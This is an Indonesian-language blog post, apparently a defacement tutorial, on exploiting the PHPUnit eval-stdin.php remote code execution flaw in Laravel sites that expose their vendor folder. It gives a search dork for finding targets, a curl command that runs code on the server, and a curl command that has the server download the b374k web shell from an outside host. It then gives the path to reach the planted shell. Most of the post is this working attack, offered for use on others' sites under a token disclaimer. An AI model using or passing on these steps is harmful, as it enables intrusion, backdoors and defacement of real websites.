Deface poc laravel php unit RCE

Hello..
Di sini saya mau membagikan cara deface poc laravel php unit RCE
oh ya disclaimer ” Gunakan dengan bijak dan jangan merusaknya tutorial ini hanya sekedar memberikan wawasan semata “
 
Langsung saja 
 
 
Dork nya:
index of vendor/phpunit
Exploit:
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

 

disini saya menggunakan curl untuk command di bawah

command untuk melihat server web nya:

curl -v -X GET –data “<?php system(‘uname -a’); ?>” 127.0.0.1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

command untuk upload shell nya:

curl -v -X GET –data “<?php system(‘wget https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/b374k.php’);” 127.0.0.1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

untuk shell nya bisa kalian rubah sendiri hehe,,oh iya ciri²web vuln yaitu blank,terdownload dll kalian coba aja 😀

oke langkah pertama kita jalan kan command untuk melihat server nya,jika tidak mau kalian bisa langsung upload shell

,jika kalian saat mengecek server nya menggunakan command diatas tetapi tidak keluar nama server nya berarti web kalian tidak vuln,oke marikita coba upload shell kita

 

shell sudah terupload sukses dan untuk cara mengaksesnya gimana ?

127.0.01/vendor/phpunit/phpunit/src/Util/PHP/b374k.php

 

cukup sekian dan terima kasih

Leave a Reply

Your email address will not be published. Required fields are marked *